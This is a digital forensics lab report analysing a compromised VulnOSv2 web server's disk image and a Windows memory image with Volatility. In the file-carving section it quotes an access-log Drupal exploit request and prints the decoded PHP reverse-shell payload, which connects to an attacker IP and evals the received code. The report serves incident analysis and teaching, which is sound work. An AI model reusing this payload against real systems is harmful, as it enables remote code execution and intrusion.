DIGITAL FORENSICS AND

ANALYSIS
DISK | MEMORY | NETWORK | WINDOWS
FAIZAN JAVED
Digital Forensics And Analysis Faizan Javed

Table of Contents
1 File Forensics .................................................................................................................................2
Lab Setup ........................................................................................................................................... 2
Initial Findings .................................................................................................................................... 3
1.2.1 Expert Witness Format (EWF) for checking the file integrity ............................................... 3
1.2.2 Checking the contents of volume system ............................................................................. 3
1.2.3 Creating the directories and mounting the file..................................................................... 3
1.2.4 Checking LVM Mappings and LVM Contents ........................................................................ 4
1.2.5 Checking Physical Volume & Setup ....................................................................................... 5
1.2.6 Mounting image to a folder .................................................................................................. 6
Timezone ........................................................................................................................................... 7
Checking System Logs ........................................................................................................................ 8
Users, Groups and Permissions ....................................................................................................... 11
1.5.1 Checking the passwd file ..................................................................................................... 11
1.5.2 Checking the Shadow File ................................................................................................... 14
1.5.3 Checking the groups............................................................................................................ 14
Data Recovery / File Carving............................................................................................................ 16
Generating a super timeline and filtering it. ................................................................................... 20
2 Memory Forensics ....................................................................................................................... 21
Introduction to Memory Forensics .................................................................................................. 21
Volatility........................................................................................................................................... 21
2.2.1 Step One of memory forensics – Getting memory info from KDBG ................................... 21
2.2.2 Running the volatility with a certain profile and different plugins ..................................... 22
2.2.3 Process and Memory Dumping – PROCDUMP / MEMDUMP ............................................. 25
2.2.4 Kernel Module Scanner – MODSCAN.................................................................................. 26
2.2.5 Network Connections Scanning .......................................................................................... 27
Introduction to Windows Memory Analysis.................................................................................... 27

1
Digital Forensics And Analysis Faizan Javed

1 Disk Forensics
Lab Setup
For Disk forensics, we have used Tsurugi Linux, along with previously dumped artifacts of a web
server (using FTK Imager).

2
Digital Forensics And Analysis Faizan Javed

Initial Findings

1.2.1 Expert Witness Format (EWF) for checking the file integrity
In order to ensure the integrity of imaged disk, we ran ewf check on the file using the following
command ewfverify filename

This MD5 check was compared with the one earlier and was found similar, indicating that there
has been no modification performed on the Imaged disk.

1.2.2 Checking the contents of volume system

In order to ensure the integrity of imaged disk, we ran ewf check on the file using the following
command mmls filename

The interested volume is LVM (006) since it’s a Linux machine.

1.2.3 Creating the directories and mounting the file

We created two directories (ewf and case1) in in path /home/maximus/Desktop/ex-
1filesystem.All the stuff shall be dumped here in these two directories.

3
Digital Forensics And Analysis Faizan Javed

Webserver.E01 is mounted in the ewf directory using the command ewfmount

1.2.4 Checking LVM Mappings and LVM Contents

Using the below commands, we shall see how the file system is being mapped on disk using
LVM.
kpartx –al path
kpartx –av path

4
Digital Forensics And Analysis Faizan Javed

Using the command lvdisplay, we can view the logical volume details.We are more interested
in knowing name of of logical volume(root) and and volume group(VulnOSv2-vg)up

name(VulnOSv2-vg).
1.2.5 Checking Physical Volume & Setup
Using the command pvs, we verified the format and size of the volume. format is lvm2 and size

5
Digital Forensics And Analysis Faizan Javed

Using the command dmsetup info, we verified the format and size of the volume. format is
lvm2 and size is 31.26g

Until this step, only the compressed version was mounted(to ewf director).

1.2.6 Mounting image to a folder

Now we shall mount the exact image and see the exact contents. Image was mounted in the
directory called case1 which was created earlier using the following command
mount -o ro,noatime,noexec,noload /dev/VulnOSv2-vg/root /path

ro → read only
noatime → nothing is to be written into the new mounted contents

6
Digital Forensics And Analysis Faizan Javed

noload →Loading of one image into multiple places may cause an error. This check is used
when you want to ignore the error.

Checking the mount status with the command mount | grep case1

Finally, Checking the contents of mount now with the command tree –L 1 path

We have successfully mounted the image as displayed in the image above.

Timezone

7
Digital Forensics And Analysis Faizan Javed

Timezone is checked foremost to correlate the logs later on. We can do with the command cat
/etc/timezone

Checking System Logs

Logs in linux can be found in /var/log directory. Logs to be inspected are systems,auth.log,
wtmp and btmp,etc.
• UTMP Logs – These give you a complete picture of user logs at which terminals, logouts,
system events and current status of the system,system boot time(used by uptime),etc.
• WTMP Logs – These give you historical data of utmp and successful logins.
• BTMP Logs – These record only failed login attempts.
These logs can be read using only last command.
last –f /var/log/wtmp | head –n 10
last –f /var/run/utmp | head –n 10
last –f /var/log/btmp | head –n 10

First, we’re going to see the wtmp logs using the command last –f case1/var/log/wtmp | head
–n 30

Above screenshot tells us that the last user logged in was the mail user logged in October 5 at
16:23 using an IP address 192.168.210.131

8
Digital Forensics And Analysis Faizan Javed

Now we shall see the failed logins using btmp with the command last –f case1/var/log/btmp |
head –n 30

The above screenshot tells us the users who have not successfully logged in. Most probably a
brute-force attack.

Then we checked the authentication logs with the command cat case1/var/logs/auth.log. This
contains the information about authentication logs(both successful and failed login) and users
who escalated their privileges and the actions performed by them.

We observed that the user vulnosadmin escalated its rights to super user(root).
Apr 3 18:41:15 VulnOSv2 sudo: pam_unix(sudo:session): session opened for user root by vulnosadmin(uid=0)

The user vulnosdadmin issued a command sudo /bin/cat/shadow

Apr 3 18:52:39 VulnOSv2 sudo: vulnosadmin : TTY=tty1 ; PWD=/etc ; USER=root ; COMMAND=/bin/cat shadow

Login failures from other users have also been observed .

Apr 3 18:16:55 VulnOSv2 login[982]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0
tty=/dev/tty1 ruser= rhost=
Apr 3 18:51:46 VulnOSv2 login[886]: FAILED LOGIN (1) on '/dev/tty1' FOR 'UNKNOWN', Authentication failure

A lot of failed attempts may prove our theory of brute force to be correct(the same date as that
in BTMP logs).

9
Digital Forensics And Analysis Faizan Javed

Successful login attempts are recorded in auth logs as well. This was verified by the following
commands.
less /home/maximus/Desktop/ex-1filesystem/case1/var/log/auth.log | grep Accepted

Connections closed were verified by using preauth keywoord.There were two IP addresses from
which connections were closed
less /home/maximus/Desktop/ex-1filesystem/case1/var/log/auth.log | grep preauth

root@Tsurugi:/home/maximus/Desktop/ex-1filesystem# strings /home/maximus/Desktop/ex-

1filesystem/case1/var/log/lastlog

10
Digital Forensics And Analysis Faizan Javed

'3*Wtty1
]pts/1
192.168.210.131
2*Wpts/0
192.168.56.101
)Wtty1
root@Tsurugi:/home/maximus/Desktop/ex-1filesystem#

Users, Groups and Permissions

1.5.1 Checking the passwd file
Using the command cat/etc/passwd we checked what permission was assigned to each user.

Understanding the above logs

root(username): X(indicates password is set):0(U-ID):0(G-ID):root(Group):/root(HomeDirectory):/bin/bas(LoginShell)

11
Digital Forensics And Analysis Faizan Javed

From the above screenshot, we have observed that the user php, mail(normally mail user has
no login) and vulnosadmin all have the shell access. Narrowing the search down and seeing
which users have the shell access.

/bin/bash means the user has access to the shell. The following users are granted access to the
shell.

From the main settings(cat /etc/passwd), we can see that the user php has home directory
/usr/php.

There are hidden files in the home directory on php user and it contains registry file bashrc.
Presence of these files mean that this user has access to bash.

Similarly, the user mail has home directory /var/mail. Looking at the contents of this home
directory.

12
Digital Forensics And Analysis Faizan Javed

Looking at the contents of the bash_history which contains the history of commands this user
has executed.

Usually, this file is removed by hacker in order to remove the traces.

From the above commands we can see that this user has ability to escalate the privileges. Also.
the password of the user php is changed.

When attacker change the bash to root(using su command) the history will go to the root.Let’s
check that out.

13
Digital Forensics And Analysis Faizan Javed

Let’s see the contents of bash_history file.

1.5.2 Checking the Shadow File

Using the command cat/etc/shadow we can check the encrypted and salted passwords.
The first identity is username and second is hashed password.

From the above diagram, we can see that the users root, mail,vulnosadmin,webmin and php
have set the password.

1.5.3 Checking the groups.

14
Digital Forensics And Analysis Faizan Javed

Using the command cat/etc/group we can see which user has the sudo access and which group
is each user part of.
maximus@Maximus:~/Desktop$ sudo cat ex-1filesystem/case1/etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,vulnosadmin
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:vulnosadmin
floppy:x:25:
tape:x:26:
sudo:x:27:php,mail
audio:x:29:
dip:x:30:vulnosadmin
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:vulnosadmin
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
netdev:x:102:
crontab:x:103:
syslog:x:104:
fuse:x:105:
messagebus:x:106:

15
Digital Forensics And Analysis Faizan Javed

mlocate:x:107:
ssh:x:108:
landscape:x:109:
vulnosadmin:x:1000:
lpadmin:x:110:vulnosadmin
sambashare:x:111:vulnosadmin
ssl-cert:x:112:postgres
mysql:x:113:
webmin:x:1001:
postfix:x:114:
postdrop:x:115:
postgres:x:116:
php:x:999:
From the above stats, we can see that the users php and mail have sudo access. vulnosadmin is
in part of multiple groups.

Data Recovery / File Carving

Again, seeing the contents of the bash_history.

From the above commands we can see that the php script was updated. Let’s check out that
script.

Seeing the contents of the script using the command less update.php

16
Digital Forensics And Analysis Faizan Javed

This is a webshell. It’s a cryptominer. Probably the system interacted with a malicious website.
We shall be finding out how threatactor gained the access.

We saw that application running was drupal(This is a content management system) and found
out the version in the update.inc file.

Next is checking the access logs. These logs are placed in the path /var/log/apache2/access.log.
We can see the related logs on day this activity occurred i.e. 5th October.POST requests are
more of interest here.
cat access.log | grep post
192.168.210.131 - - [05/Oct/2019:13:01:27 +0200] "POST
/jabc/?q=user/password&name%5b%23post_render%5d%5b%5d=assert&name%5b%23markup%5d=eval%28base
64_decode%28Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMjEwLjEzMSc7ICRwb3J
0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA
9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja
29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB
9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkV
ULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyB
pZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2t
ldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3
RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcy
wgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFj.aygiTmxlbiIsICRsZW4pOyAkbGVuID0gJG
FbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3
N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29j
a2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR
0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmI
GluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9m
dW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7%29%29%3b&n
ame%5b%23type%5d=markup HTTP/1.1" 200 13983 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

17
Digital Forensics And Analysis Faizan Javed

Now the post requests seem to be base 64 encoded, so we will decode it using an online
platform. We can use two websites and their purpose is mentioned below.
1) https://www.base64decode.org (Used for decoding the base64 encoding).
2) https://www.unphp.net/decode ( UnPHP is a free service for analyzing obfuscated and
malicious PHP code)
We have decoded the above base64 encoded POST logs.
<6s,Š‫ݝ‬彷-uwu,zgjgomj.^v{?u(u/*<?php /**/ error_reporting(0); $ip = '192.168.210.131'; $port = 4444; if (($f =
'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f =
'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') &&
is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) {
die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case
'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a =
unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .=
fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } }
$GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') &&
ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else {
eval($b); } die();‫{[ݽݹڙ‬r]云Lm4•|

Now we shall convert the decoded file into code form using the second link mentioned above.

Now we know that the attacker gain access by exploiting PHP vulnerability.

From the bash_history, attacker went to the tmp folder and deleted the 37292.c permanently.

We can recover the data until and unless itt hasnot been overwritten. There’re different tools
used to recover the data such as ftk,foremost,autopsy,etc.We shall be using
This is an ext4 file system and ext4 file system come with a journal system which is introduced
to reduce the latency of copying files when system automatically shut down. Journal file system
keep tracks/records of the files being copied and aid in restoration with minimum time. Moreover,
journal file system by default is placed at inode number 8. We shall use a program called DEBUG FS.
Sudo debugfs -R ‘dump <8> ./journal’ /dev/VulnOSv2-vg/root

18
Digital Forensics And Analysis Faizan Javed

journal is a binary data file. We can check the filetype using the command file filename

This is a 128M file.

Now using the ext4magic tool, we shall be dumping this data file into another output directory.
We can do it in two ways
i. Dump the entire data
sudo ext4magic /dev/VulnOSv2-vg/root -f case1/tmp -j journal -M -d output2/

ii. Dump the data after certain date

Step1: Create a variable (e.g. after) which will contains the certain time period after
date
$ after=$(date -d"-20days" +%s)
Step2:
$sudo ext4magic /dev/VulnOSv2-vg/root $after -f case1/tmp –j journal -M -d
output2/

19
Digital Forensics And Analysis Faizan Javed

What is 37292.c exactly !

Generating a super timeline and filtering it.

i. Generating timeline with plaso log2timeline tool. The below command will
generate a plaso file(unsorted) named timeline.case1
sudo log2timeline.py -z timezoneValue -t / --parse
linux,apache_access,apt_history timeline.case1 case1/

ii. Sorting the generated timeline

sudo psort.py -z Europe/Brussels -o L2tcsv -w webserver.csv timeline.case1
"date
This will created a new csv file named webserver.csv. which can be view in
MS Office or LibreOffice.

20
Digital Forensics And Analysis Faizan Javed

2 Memory Forensics
Introduction to Memory Forensics
- Memory Acquisition Tools: FTK Imager, DUMP IT, BELKASOFT LIVE RAM CAPTURE,
WHEN PMM.
- Memory Forensic Tools: Redline(Windows memory forensics tool from FireEye, GUI but
less effective) and Volatility(CLI but more effective).

Volatility
2.2.1 Step One of memory forensics – Getting memory info from KDBG
The first and the foremost thing for forensics is we need to run the image info plugin so the
software can make the best guess memory profile to parse the memory. To do this volatility
going to search for Kernel Debugger Block (KDBG). This is the structure used by Windows kernel
for debugging purposes.
Command: volatility –f filename imageinfo

From the above snippet we can see that suggest Oss are WinXPSP2 and WinXPSP3

21
Digital Forensics And Analysis Faizan Javed

2.2.2 Running the volatility with a certain profile and different plugins
Once we know the profile, we can run the volatility utility with a certain profile and different
plugins using the command volatility –f filename –profile profile-name plugin .

Plugin Description
autoruns Searches the registry and memory space for applications running at
system startup and maps them to running processes
bioskbd Reads the keyboard buffer from Real Mode memory
cachedump Dumps cached domain hashes from memory
chromecookies Scans for and parses potential Chrome cookie data
chromedownloadchains Scans for and parses potential Chrome download chain records
chromedownloads Scans for and parses potential Chrome download records
chromehistory Scans for and parses potential Chrome url history
chromevisits Scans for and parses potential Chrome url visits data
clipboard Extract the contents of the windows clipboard
cmdline Display process command-line arguments
cmdscan Extract command history by scanning for _COMMAND_HISTORY
connections
connscan Pool scanner for tcp connections
consoles Extract command history by scanning for
_CONSOLE_INFORMATION
crashinfo Dump crash-dump information
deskscan Poolscaner for tagDESKTOP (desktops)
devicetree Show device tree
directoryenumerator Enumerates all unique directories from FileScan
dumpcerts Dump RSA private and public SSL keys
dumpfiles Extract memory mapped and cached files
dumpregistry Dumps registry files out to disk
eventhooks Print details on windows event hooks
evtlogs Extract Windows Event Logs (XP/2003 only)
filescan Pool scanner for file objects
firefoxcookies Scans for and parses potential Firefox cookies (cookies.sqlite
moz_cookies table
firefoxhistory Scans for and parses potential Firefox url history (places.sqlite
moz_places table)
iehistory Reconstruct Internet Explorer cache / history
imagecopy Copies a physical address space out as a raw DD image
imageinfo Identify information for the image
kdbgscan Search for and dump potential KDBG values
machoinfo Dump Mach-O file format information
malfind Find hidden and injected code
malfinddeep Find hidden and injected code, whitelist with ssdeep hashes

22
Digital Forensics And Analysis Faizan Javed

malprocfind Finds malicious processes based on discrepancies from observed,

normal behavior and properties
malsysproc Find malware hiding in plain sight as system processes
mbrparser Scans for and parses potential Master Boot Records (MBRs)
memdump Dump the addressable memory for a process
memmap Print the memory map

mimikatz mimikatz offline

moddump Dump a kernel driver to an executable file sample
modscan Pool scanner for kernel modules
netscan Lists existing and established connections
notepad List currently displayed notepad text
openioc_scan Scan OpenIOC 1.1 based indicators
openvpn Extract OpenVPN client credentials (username, password) cached
in memory.
privs Display process privileges
procdump Dump a process to an executable file sample
processbl Scans memory for processes and loaded DLLs and compares the
results with the baseline
pslist Print all running processes by following the EPROCESS lists
psscan Pool scanner for process objects
pstotal Combination of pslist,psscan & pstree --output=dot gives graphical
representation
pstree Print process list as a tree
psxview Find hidden processes with various process listings
raw2dmp Converts a physical memory sample to a windbg crash dump
sessions List details on _MM_SESSION_SPACE (user logon sessions)
sockets Print list of open sockets
sockscan Pool scanner for tcp socket objects
ssdeepscan Scan process or kernel memory with SSDeep signatures
vboxinfo Dump virtualbox information
vmwareinfo Dump VMware VMSS/VMSN information
volshell Shell in the memory image
windows Print Desktop Windows (verbose details)
wndscan Pool scanner for window stations
yarascan Scan process or kernel memory with Yara signatures

23
Digital Forensics And Analysis Faizan Javed

Plugin Description
pslist displays all the running processes that are found within this memory image.This
information is useful in detecting a malware on memory dumps.
Pslist also lists exited processes(2 in the snippet below).

psscan Provides more indepth view as compared to pslist.

This plugin can find more processes as compared to pslist.

pstree provides a hierarchical structure of the processes.

24
Digital Forensics And Analysis Faizan Javed

cmdscan / Useful for gather commands when attacker types in commands at windows
consoles command line.

Consoles not only collects the scans but also the results of that command
executed by attacker.

2.2.3 Process and Memory Dumping – PROCDUMP / MEMDUMP

We can dump the information of an evil process using the procdump command volatility –f
filename –profile profile-name procdump –p PID --dump-dir=directory-path .
We dumped the information of SVC process using the above command in the current directory.
This command will generate a Windows executable (using the file command, we can see file
type).

In the similar manner, if a process seems malicious, we can dump it out from the memory
image and performs different functionalities such as finding hash and perform different kinds of
analysis.

25
Digital Forensics And Analysis Faizan Javed

Another very useful tool is memdump, instead of dumping the executable we can dump the
associated memory with that that process. We can dump the associated memory of a process
with the command volatility –f filename –profile profile-name memdump –p PID --dump-
dir=directory-path .

2.2.4 Kernel Module Scanner – MODSCAN

This scan will actually show kernel modules or drivers that are unloaded or hidden on unlinked
by rootkits.
This scan is useful for running process that has no mapped file on disk associated with it, in
other words it only exists in memory.
We can run the modscan with the command volatility –f filename –profile profile-name
modscan .

26
Digital Forensics And Analysis Faizan Javed

2.2.5 Network Connections Scanning

There’re different plugins available for different windows versions.

Operating System Available Plugin

Windows XP connections, connscan, sockets, sockscan
Windows Server 2003 connections, connscan, sockets, sockscan
Later Versions netScan

A useful python script ip2geotools for location non 1918 RFC IP addresses.
Using netscan, we can see the communication with of a certain process with external addresses
and eventually we can process dump and memory dump of that particular process for further
analysis.

Introduction to Windows Memory Analysis

2.3.1 Volatility Plugins (pstree,pslist and psscan)
2.3.2 Malfind
This plugin used to find hidden or inject code/DLLs in the memory image.

2.3.3 Hollowfind
This plugin is designed to find detection of various process hollowing techniques

Process injection vs process hollowing

2.3.4 Procdump
dump the malicious processes and hash them. Submit the hashes to virustotal

27